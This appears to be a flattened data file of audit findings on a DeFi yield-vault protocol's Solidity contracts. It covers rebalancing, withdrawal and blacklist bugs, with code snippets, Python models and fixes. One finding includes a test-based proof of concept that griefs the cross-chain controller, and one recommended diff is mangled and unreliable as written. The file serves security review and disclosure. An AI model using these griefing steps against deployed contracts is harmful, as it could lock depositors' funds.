It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, "Already a request");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.
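The override can be modeled with a minimal Python sketch (names mirror the report; the values and class are hypothetical):

```python
# Hypothetical model of withdrawalRequest before the first rebalance:
# while rebalancingPeriod == 0, the "Already a request" guard never trips,
# so a repeat call burns more shares and overwrites the allowance.
class UserInfo:
    def __init__(self, shares: int):
        self.shares = shares
        self.withdrawalAllowance = 0
        self.withdrawalRequestPeriod = 0

def withdrawal_request(user: UserInfo, amount: int,
                       exchange_rate: int, rebalancing_period: int) -> None:
    if user.withdrawalRequestPeriod != 0:              # require(... == 0)
        raise RuntimeError("Already a request")
    user.shares -= amount                              # _burn
    user.withdrawalAllowance = amount * exchange_rate  # overwrite, not +=
    user.withdrawalRequestPeriod = rebalancing_period

u = UserInfo(shares=100)
withdrawal_request(u, 40, 1, rebalancing_period=0)
withdrawal_request(u, 10, 1, rebalancing_period=0)  # guard passes again
assert u.shares == 50                # 50 shares burned in total...
assert u.withdrawalAllowance == 10   # ...but only the last value survives
```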
Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.
While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.
```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, "Already a request");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n
An inactive vault can disrupt rebalancing of active vaults
medium
An inactive vault can send its total underlying amount to the `XChainController` and disrupt rebalancing of active vaults by increasing the `underlyingReceived` counter:\\nif `pushVaultAmounts` is called before `underlyingReceived` overflows, rebalancing of one of the active vaults may get stuck since the vault won't receive XChain allocations;\\nif `pushVaultAmounts` is called after all active vaults and at least one inactive vault have reported their underlying amounts, rebalancing of all vaults will get stuck.\\nRebalancing of vaults starts when Game.pushAllocationsToController is called. The function sends the allocations made by gamers to the `XChainController`. `XChainController` receives them in the receiveAllocationsFromGame function. In the settleCurrentAllocation function, a vault is marked as inactive if it has no allocations and there are no new allocations for the vault. `receiveAllocationsFromGameInt` remembers the number of active vaults.\\nThe next step of the rebalancing process is reporting vault underlying token balances to the `XChainController` by calling MainVault.pushTotalUnderlyingToController. As you can see, the function can be called in an inactive vault (the only modifier of the function, `onlyWhenIdle`, doesn't check that `vaultOff` is false). `XChainController` receives underlying balances in the setTotalUnderlying function: notice that the function increases the number of balances it has received.\\nThe next step is the XChainController.pushVaultAmounts function, which calculates how many tokens each vault should receive after gamers have changed their allocations. 
The function can be called only when all active vaults have reported their underlying balances:\\n```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n "Not all underlyings received"\\n );\\n _;\\n}\\n```\\n\\nHowever, as we saw above, inactive vaults can also report their underlying balances and increase the `underlyingReceived` counter. If this is abused, mistakenly or intentionally (e.g. by a malicious actor), vaults may end up in a corrupted state. Since all the functions involved in rebalancing are not restricted (including `pushTotalUnderlyingToController` and `pushVaultAmounts`), a malicious actor can intentionally disrupt the accounting of vaults or block a rebalancing.
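A simplified Python model of the counter mismatch (hypothetical, two active vaults; not the contract code):

```python
# An inactive vault can also bump underlyingReceived, satisfying the
# equality check while an active vault has not reported yet.
active_vaults = 2
underlying_received = 0

def set_total_underlying(vault_is_active: bool) -> None:
    # the real setTotalUnderlying does not check vault activity either
    global underlying_received
    underlying_received += 1

def push_vault_amounts() -> str:
    # modifier onlyWhenUnderlyingsReceived
    if underlying_received != active_vaults:
        raise RuntimeError("Not all underlyings received")
    return "rebalanced"

set_total_underlying(True)    # active vault #1 reports
set_total_underlying(False)   # inactive vault reports too
assert push_vault_amounts() == "rebalanced"  # active vault #2 is skipped
```

A third report (a second inactive vault) would push the counter past `active_vaults` and jam the modifier permanently, matching the second impact scenario.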
In the `MainVault.pushTotalUnderlyingToController` function, consider disallowing inactive vaults (vaults that have `vaultOff` set to true) report their underlying balances.
If an inactive vault reports its underlying balances instead of an active vault (i.e. `pushVaultAmounts` is called when `underlyingReceived` is equal to activeVaults), the active vault will be excluded from rebalancing and won't receive updated allocations in the current period. Since the rebalancing interval is 2 weeks, the vault will lose the increased yield that might've been generated thanks to new allocations.\\nIf an inactive vault reports its underlying balances in addition to all active vaults (i.e. `pushVaultAmounts` is called when `underlyingReceived` is greater than activeVaults), then `pushVaultAmounts` will always revert and rebalancing will get stuck.
```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n "Not all underlyings received"\\n );\\n _;\\n}\\n```\\n
Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults
medium
Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after the next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after the next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the function sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawal requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced; its value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period; this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. 
The amounts are then used to calculate how many tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from the vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it can then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances received from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis causes the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n
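A toy Python model of the accumulation (hypothetical numbers; `OverflowError` stands in for the Solidity revert):

```python
# resetVaultUnderlying never zeroes totalWithdrawalRequests, so the
# historical total eventually exceeds totalUnderlying and the subtraction
# "reverts", blocking pushVaultAmounts forever.
total_underlying = 0
total_withdrawal_requests = 0

def reset_vault_underlying() -> None:
    global total_underlying
    total_underlying = 0
    # bug: total_withdrawal_requests is NOT reset here

def rebalance_period(underlying: int, new_requests: int) -> int:
    global total_underlying, total_withdrawal_requests
    reset_vault_underlying()
    total_underlying = underlying
    total_withdrawal_requests += new_requests
    if total_withdrawal_requests > total_underlying:
        raise OverflowError("revert: underflow in pushVaultAmounts")
    return total_underlying - total_withdrawal_requests

assert rebalance_period(1000, 400) == 600   # period 1 is fine
try:
    rebalance_period(1000, 700)             # historical total is now 1100
except OverflowError:
    pass                                    # rebalancing is stuck
```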
In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.
Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enabled in the next rebalancing period, depositors may not be able to withdraw their funds from vaults due to a blocked rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, none of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.
```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n
`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state
medium
A user can grief the send-funds-to-vault state transition by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here, any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is triggered per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to, `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n
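The griefing can also be shown with a minimal Python model (hypothetical, four chains; the counter wrap stands in for the state reset):

```python
# sendFundsToVault never records which chain was processed, so repeating
# one chain walks the counter to the reset threshold.
active_chains = 4
funds_received = 0

def send_funds_to_vault(chain_id: int) -> str:
    # bug: no check that chain_id was already served
    global funds_received
    funds_received += 1
    if funds_received == active_chains:
        funds_received = 0        # state reset for the whole vaultNumber
        return "state reset"
    return "pending"

results = [send_funds_to_vault(10) for _ in range(4)]  # same chain, 4x
assert results[-1] == "state reset"   # reset fired; real chains unserved
```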
Issue `XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state\\nI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n
XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.
```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n
Vault could `rebalance()` before funds arrive from xChainController
medium
sendFundsToVault() is invoked to push funds from xChainController to vaults, which calls xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` is to invoke receiveFunds(); `pushFeedbackToVault()` always travels through the slow path.\\n`xTransfer()` is to transfer funds from one chain to another. If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is that if the `xcall()` of `pushFeedbackToVault()` executed successfully before `xTransfer()` transfers the funds to the vault, anyone can invoke rebalance(); this will lead to rebalancing vaults with incomplete funds (this could be true only if the funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together).\\nThe above scenario could occur in two possible cases: 1- `xTransfer()` will go through the slow path, but because of high slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- The Connext team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor "fast path" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to different Merkle roots and this will lead to executing
`receiveFunds()` before funds arrive.
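A sketch of the recommendation ("check if funds have arrived") in Python — a hypothetical guard, not the contract code — gating the state change on the vault actually holding the expected amount:

```python
# Gate receiveFunds on the vault balance, so an early feedback message
# cannot unlock rebalancing before the xTransfer lands.
class VaultModel:
    def __init__(self, expected: int):
        self.balance = 0
        self.expected = expected
        self.state = "WaitingForFunds"

    def receive_funds(self) -> None:
        # guard: only settle once the xTransfer amount is really here
        if self.balance < self.expected:
            raise RuntimeError("funds not yet arrived")
        self.state = "RebalanceVault"

v = VaultModel(expected=500)
try:
    v.receive_funds()      # feedback landed before the transfer -> rejected
except RuntimeError:
    pass
v.balance = 500            # xTransfer finally lands
v.receive_funds()
assert v.state == "RebalanceVault"
```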
Check whether funds have arrived or not
The vault could `rebalance()` before funds arrive from xChainController; this will reduce rewards
```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n
Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method
medium
The deposit method calculates the net amount transferred from the user. It takes `reservedFunds` into consideration when calculating `balanceBefore` and `balanceAfter`, but that is not actually required.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`
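The two netting variants can be compared with a short Python sketch (hypothetical numbers; `OverflowError` stands in for the uint revert):

```python
# Subtracting reservedFunds on both sides cancels out when it fits, and
# reverts before the transfer when reservedFunds exceeds the balance.
def deposit_current(vault_balance: int, reserved_funds: int, amount: int) -> int:
    before = vault_balance - reserved_funds
    if before < 0:                     # uint subtraction would revert here
        raise OverflowError("revert: reservedFunds > vault balance")
    vault_balance += amount            # safeTransferFrom
    after = vault_balance - reserved_funds
    return after - before              # same net amount either way

def deposit_fixed(vault_balance: int, amount: int) -> int:
    before = vault_balance
    vault_balance += amount
    return vault_balance - before

assert deposit_current(1000, 200, 50) == 50   # reservedFunds cancels out
assert deposit_fixed(100, 50) == 50           # fixed version never reverts
try:
    deposit_current(100, 200, 50)             # reverts before the transfer
except OverflowError:
    pass
```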
Use the code below. This is the correct way of finding the net amount transferred by the depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n
Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`
```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n
Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic
medium
`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the values of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklisted protocol. If even one of the `Baskets` has a non-zero allocation to a protocol on the blacklist, receiveProtocolAllocations() will revert via `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), "Protocol on blacklist");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand you won't be able to execute rebalance()
You should check whether the protocol is on the blacklist when Game players call `rebalanceBasket()`
The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.
```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n
Asking for `balanceOf()` in the wrong address
medium
on sendFundsToVault() this logic\\n```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nin case `_chainId` is Optimism, the `underlying` address is an Optimism (L2) address, but `XChainController` is on Mainnet, so you can't invoke `balanceOf()` like this!!!
Issue Asking for `balanceOf()` in the wrong address\\n`getUnderlyingAddress(_vaultNumber, _chain);` should just be `getUnderlyingAddress(_vaultNumber);` so the `underlying` here\\n```\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nwill always be on Mainnet
Asking for `balanceOf()` in the wrong address The protocol will be not able to rebalance the vault
```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n
`getDecimals()` always calls Mainnet
medium
`XChainController.pushVaultAmounts()` is to push `exchangeRate` to the vaults. `XChainController.getVaultAddress()` returns the vault address of `vaultNumber` with the given `chainID`\\n`pushVaultAmounts()` invokes `xProvider.getDecimals()` internally to calculate `newExchangeRate`\\nxProvider.getDecimals() always calls `address(vault)` on Mainnet, but `address(vault)` could be on any chain. `XChainController.pushVaultAmounts()` could keep reverting for every `chainID` (only Mainnet will be correct), or it will return the wrong `decimals` values (if the `address(vault)` is for another chain/L2 but exists on Mainnet with a decimals()).\\nThis will lead to a wrong `newExchangeRate`\\n```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n
You should invoke `getVaultAddress()` with the `_chain` of Mainnet, because all vaults of the same `vaultNumber` have the same decimals (not all `vaultNumber`s do)
`pushVaultAmounts()` will keep reverting and this will break all rebalancing logic
```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n
User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price
medium
User should not receive rewards for the rebalance period when the protocol was blacklisted, because of the unpredictable behaviour of the protocol price.\\nWhen a user allocates derby tokens to some underlying protocol, he receives rewards according to the exchange price of that protocol's token. This reward can be positive or negative. Rewards of a protocol are set to the `Game` contract inside the `settleRewards` function and they are accumulated for the user once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, the previous price of the protocol is compared with the current price.\\nIn case some protocol is hacked, there is the `Vault.blacklistProtocol` function, which should withdraw reserves from the protocol and mark it as blacklisted. The problem is that, because of the hack, it's not possible to determine what will happen with the exchange rate of the protocol. It can be 0, or it can be very small, or it can be high for any reason. But the protocol still accrues rewards per token for the protocol, even though it is blacklisted. Because of that, a user that allocated to that protocol can be credited with very big negative or positive rewards. 
Both of these cases are bad.\\nSo I believe that in case a protocol is blacklisted, it's better to set its rewards to 0.\\nExample. 1.User allocated 100 derby tokens to protocol A. 2.Before the `Vault.rebalance` call, protocol A was hacked, which made its exchangeRate not real. 3.The Derby team blacklisted protocol A. 4.Vault.rebalance is called, which used the new (incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken`. 5.When the user calls rebalanceBasket next time, his rewards are accumulated with an extremely high/low value.
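The recommended fix can be illustrated with a small Python model of the reward formula (hypothetical values; not the contract code):

```python
# Force the reward per locked token to 0 for a blacklisted protocol
# instead of deriving it from a post-hack, meaningless price.
def reward_per_locked_token(current_price: int, last_price: int,
                            total_underlying: int, allocated: int,
                            perf_fee_pct: int, blacklisted: bool) -> int:
    if blacklisted:                 # recommended guard
        return 0
    if allocated == 0:
        return 0
    price_diff = current_price - last_price
    nominator = total_underlying * perf_fee_pct * price_diff
    denominator = allocated * last_price * 100
    return nominator // denominator

# normal period: small positive reward
assert reward_per_locked_token(105, 100, 10_000_000, 10, 5, False) == 2500
# hacked protocol: price collapsed, but the reward is zeroed instead of
# becoming an extreme negative number
assert reward_per_locked_token(1, 100, 10_000_000, 10, 5, True) == 0
```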
Issue User should not receive rewards for the rebalance period when the protocol was blacklisted, because of the unpredictable behaviour of the protocol price\\nIf the protocol is blacklisted, set `rewardPerLockedToken` to 0 inside the `storePriceAndRewards` function.
User's rewards calculation is unpredictable.
```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n
The protocol could not handle multiple vaults correctly
medium
The protocol needs to handle multiple vaults correctly. If there are three vaults (e.g. USDC, USDT, DAI), the protocol needs to rebalance them all without any problems.\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invokes `rebalanceNeeded()` to check if a rebalance is needed based on the set interval, and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut the first invocation (for the USDC vault) of `pushAllocationsToController()` will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for the DAI vault) `pushAllocationsToController()`, it will revert because of\\n```\\nrequire(rebalanceNeeded(), "No rebalance needed");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI), you can only do one rebalance every `rebalanceInterval`
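A Python sketch of the recommendation — tracking `lastTimeStamp` per `vaultNumber` (a dict here; the report suggests an array) so one vault's rebalance no longer blocks the others:

```python
# Per-vault timestamps: each vault has its own rebalance clock.
REBALANCE_INTERVAL = 14 * 24 * 3600          # hypothetical: two weeks
last_timestamp: dict = {}                    # vaultNumber -> timestamp

def rebalance_needed(vault_number: int, now: int) -> bool:
    return now - last_timestamp.get(vault_number, 0) > REBALANCE_INTERVAL

def push_allocations_to_controller(vault_number: int, now: int) -> None:
    if not rebalance_needed(vault_number, now):
        raise RuntimeError("No rebalance needed")
    last_timestamp[vault_number] = now       # only this vault's clock moves

now = 20_000_000
push_allocations_to_controller(0, now)       # USDC vault
push_allocations_to_controller(1, now)       # DAI vault no longer reverts
assert not rebalance_needed(0, now) and not rebalance_needed(1, now)
```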
Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array
The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values
```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n
Vault.blacklistProtocol can revert in emergency
medium
Vault.blacklistProtocol can revert in an emergency, because it tries to withdraw the underlying balance from the protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw the whole balance from the protocol. This can create problems: in case of a hack, an attacker can steal funds, pause the protocol, or do any other thing that can make the `withdrawFromProtocol` function revert. Because of that, it will not be possible to add the protocol to the blacklist, and as a result the system will stop working correctly.
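The suggested `needToWithdraw` parameter can be sketched in Python (a hypothetical API, not the contract): blacklist first, attempt the revert-prone withdrawal only on request.

```python
# Blacklisting always succeeds; the withdrawal is opt-in and retryable.
blacklisted = set()

def withdraw_from_protocol(protocol: str, hacked: bool) -> None:
    if hacked:
        raise RuntimeError("revert: underlying protocol paused/hacked")

def blacklist_protocol(protocol: str, need_to_withdraw: bool,
                       hacked: bool = False) -> None:
    blacklisted.add(protocol)          # always succeeds
    if need_to_withdraw:
        withdraw_from_protocol(protocol, hacked)

blacklist_protocol("protocolA", need_to_withdraw=False, hacked=True)
assert "protocolA" in blacklisted      # blacklisting is no longer blocked
# later, once withdrawal is safe again:
blacklist_protocol("protocolA", need_to_withdraw=True, hacked=False)
```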
Provide a `needToWithdraw` param to the `blacklistProtocol` function. If it's safe to withdraw, then withdraw; otherwise, just mark the protocol as blacklisted. You can also call the function with the `true` param again once it's safe to withdraw. Example of a hack-situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist("vault", false) which blacklists the vault 3.in the next tx you call setProtocolBlacklist("vault", true) and try to withdraw
Hacked or paused protocol can't be set to blacklist.
